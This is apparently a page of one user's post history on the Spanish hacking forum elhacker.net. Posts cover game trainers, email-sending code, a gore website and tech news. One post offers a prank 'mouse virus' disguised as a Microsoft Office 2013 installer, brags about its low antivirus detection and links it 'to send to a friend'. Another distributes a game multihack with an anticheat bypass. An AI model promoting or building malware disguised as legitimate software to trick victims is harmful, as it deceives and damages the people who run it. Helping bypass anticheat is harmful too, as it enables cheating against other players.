elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: 1 ... 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 [47] 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 ... 72
461  Seguridad Informática / Análisis y Diseño de Malware / [SOURCE-CODE] Virus de Mause Con disfraz de de Microsoft Office 2013 en: 28 Febrero 2018, 00:55 am
Bueno como dice el titulo hoy hice este sensual instalador de Microsoft Office 2013 JAJAJAJAJA  :laugh:

Citar

Bueno no . no es un instalador. Es un :

Virus de Mause




Bueno ya basta de auto-trollearme. XD

El virus es detectado solo por 1 antivirus llamado Biadu que de paso es muy poco conocido XD . perdonen si los ofendí a aquellos que usan este antivirus XD

He aquí el análisis :

https://www.virustotal.com/#/file/e939df12700eecd8a492d08b1e607817cbb8bacb35a7e1a10fc7283ab18079f3/detection

Imagen del virus:


Imagen del virus Ejecutándose:



Bueno he aquí el Link Para que se lo manden a un amigo XD : https://mega.nz/#!x01A1TZT!7ogKZaSHjIGBXoA3fNFvAdnWVjpnCS3VdtBQ4jR2rlE

PD : Recuerden que el virus es una copia exacta de Microsoft Office 2013 , no notaran la diferencia . . .
Bueno excepto tal vez por la música SAD de fondo de naruto que le puse y si se preguntan por que ;  



BUENO ES POR QUE EL VIRUS LO HICE YO Y ME DIO LA PUT* GANA DE PONER ESA MÚSICA

PD : LE PUSE POR DEFECTO LA TECLA F10 PARA QUE SE CIERRE EL VIRUS. NO SOY TAN TONTO PARA YO MISMO INFECTARME.

Citar


[SOURCE-CODE VB.NET] Virus de Mause


462  Programación / .NET (C#, VB.NET, ASP) / [SOURCE-CODE] Point Blank MultiHack . Incluye Bypass al X-trap XD en: 27 Febrero 2018, 03:16 am
Hola a todos ... . .  bueno como dice el titulo los que les prometí en el pos anterior . Wallhack & Aimbot totalmente en VB.NET siii VB.NET  ;-) .

Bueno , estaba intentando subirlo a github pero se me agoto la paciencia al intentando crear la put* carpeta en el repositorio de github.

entonces como les decía :



El MultiHack contiene :


* Point Blank Loader
* Bypass al ANTICHEAT X-TRAP . XD . Próximamente buscare otras formas de Burlarlo , (tal-vez pausando el Proceso y editando la memoria XD )
* WALLHACK CT
* WALLHACK TR
* AIMBOT


Bueno He Aquí una foto del Multihack :



Análisis de Virus-total :

Point Blank MultiHack Virustotal Análisis

Genial nunca vi un Hack Tan limpio  :P

Link del Archivo Ejecutable:

Point Blank MultiHack

Link del SOURCE-CODE:

Point Blank MultiHack [SOURCE-CODE]



PD: Para la Próxima Les Traeré  un ESP-BOX wallhack un 2d o tal vez 3d.     :laugh:

PD2: También Corregiré el Bug de Cuando el juego se encuentra en Pantalla Completa.  :laugh:

Bueno hare esa 2 Cosas Cuando Cuando apreda bien a usar Direcx en VB.NET .(eso me recuerda a que tengo que desargar el Direcx SDK )  :P

PD: En la creación de este Hack me he ayudado de información y Ejemplos de Otros foros. /(También tuve que traducir code de C a VB.NET  :-\ )
463  Programación / .NET (C#, VB.NET, ASP) / Re: Problema con emails. SMTP 5.5.1 Autentificación. en: 24 Febrero 2018, 22:37 pm
yo también tenia es problema y por eso hice este post:

https://foro.elhacker.net/net/clase_o_modulo_para_enviar_correo_gmailhotmailyahoo-t480147.0.html

la solución al problema fue usar esta clase del compañero @Elektro:

https://pastebin.com/YXatPRiU esta es la clase, solo es para enviar Gmail .

Pero si quieres usar hotmail lee el post que te puse y busca la otra clase de Elektro y modificala.  ;D

PD : Empezando la Clase te dice como usarla .  ;D Agradécele a @Electro que es el autor.
464  Foros Generales / Foro Libre / : Daily Media ,Humor. . . GORE-NECROFILIEA-Asesinatos on live... en: 21 Febrero 2018, 17:39 pm
Bueno , como están .. supongo que bien hasta el momento . .

algunos ya sabrán de esta pagina o otras tales como GORINGA.NET que fue un foro donde entroncabas de todo (MORBO COLECTION.) . Fue .. por que el foro termino cayendo .

Por el momento y es una pagina mas vieja , esta que todavía funcionan.
Código:
theYNC.com

Bueno es para mi de gran asombro que paginas como estas con contenido GORE. ETC. puedan estar en la Internet normal . Si estuvieran en la deepWEB No me asombrarían en lo absoluto.

En esta pagina se encuentran vídeos como estos:

Contenido eliminado debido a la violencia mostrada.

Que piensan Ustedes de esta pagina Para mi no debería encontrarse en la web normal.


PD: los link me los pasaron por el facebook.


Mod: Enlace eliminado debido a la violencia mostrada. Los links muestran contenido no apto para personas sensibles. Visitar a discreción propia.
465  Programación / .NET (C#, VB.NET, ASP) / Re: [SOURCE-CODE] Trainer Con menú tipo d3d para Haloce 1.09 en: 19 Febrero 2018, 21:16 pm
Citar
Tengo una pregunta: ¿cuando dices "con menú tipo Direct3D", a que te refieres exactamente?, ¿podrías mostrar un ejemplo/imagen para que comprendamos la diferencia entre ese tipo de menú/disposición de los controles en la interfaz de usuario en DX/D3D, y el que tu hiciste en GDI+/Directshow?

Bueno algo asi :



Citar
Si por un casual te estás intentando referir al típico trainer, bot o HUD o programa en general con capacidades DirectX/Direct3D que se superpone y se renderiza de forma semi transparente sobre la ventana del juego en pantalla completa, para ello en .NET y WindowsForms puedes usar la librería SharpDX, que es basicamente un wrapper de las librerías de DirectX. Yo tengo desarrollado un form reutilizable (una plantailla o clase de Form) en SharpDX precisamente para ese propósito, con transparencia y características interesantes, si te interesa el código, pídemelo, aquí abajo te muestro una demo de un ejemplo muy básico que hice (solo le añadí unos labels, se le puede añadir cualquier control, botones etc):


Exacto eso es lo que quiero , pero los ejemplos en Internet que busque salen en puro C++ . de paso al poner el haloce en pantalla completa el trainer me titila y no se puede usar.  :-\

PD: Se me olvido poner en la parte del trainer . Show in Task = False.  ;D

PD2: Como le hiciste en el Hud del vídeo, para que te corriera bien con el juego en pantalla completa?
466  Programación / .NET (C#, VB.NET, ASP) / [SOURCE-CODE] Trainer Con menú tipo d3d para Haloce 1.09 en: 19 Febrero 2018, 18:26 pm
Bueno , hice un trainer con menú tipo d3d (ojo no es d3d es un simple form) se activa y desactiva con la tecla Insert .

bueno lo hice para la versión de haloce 1.09 la mas nueva creo que es el parche 1.10 , en ese caso solo abren cheat engine y cambian los adress en youtube hay muchos tutoriales.



La Mayoría de Ejemplos que busque en Internet están en C++ , Fue un dolor de cabeza ponerme a convertir el code a vb.net y buscar documentación al respecto en https://www.unknowncheats.me/forum/ que de paso el foro es en ingles   :¬¬   :-\

bueno les dejo una imagen :



link:

Trainer Para HaloCE by **Aincrad**

                                    Como Siempre Comenten plis  :xD . Mas adelante subire Un Aimbot y Wallhack.  ;D
467  Foros Generales / Noticias / Re: Un tipo pide a Microsoft 600 millones por actualización fallida a Windows 10 en: 17 Febrero 2018, 01:21 am
ALV . Por que no intento actualizar mi Windows Vista de un solo golpe a Windows 10 y si falla , intento que Microsoft me de una indemnización de 600 millones de dólares.  :P
468  Programación / .NET (C#, VB.NET, ASP) / Re: Clase o modulo para enviar correo gmail/hotmail/yahoo en: 11 Febrero 2018, 15:42 pm
Gracias si funciona . me fui en el apartado de SEGURIDAD de mi cuenta Gmail y permití las aplicaciones menos seguras. :) si funciona .   ;-)
469  Programación / .NET (C#, VB.NET, ASP) / Re: Clase o modulo para enviar correo gmail/hotmail/yahoo en: 11 Febrero 2018, 13:25 pm
hola , bueno el error se soluciono pero ahora me sale un error , (el error que me salia con los primeros codes que intente)

"Authentication Required"  bueno esto ya creo que es el Servidor Gmail , alguna solución?

470  Programación / .NET (C#, VB.NET, ASP) / Re: Clase o modulo para enviar correo gmail/hotmail/yahoo en: 11 Febrero 2018, 01:12 am
arggg . ahora lo puse así :

Código
  1. SystemOS.NET.Tools.MailUtil.SendGMailText("grup.fisica.638@gmail.com", "*", txtAsunto.Text, rtbMensaje.Text, "maria7diaz@hotmail.com")

pero cuando depuro al presionar el botón que contiene el code  :


Páginas: 1 ... 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 [47] 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 ... 72
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines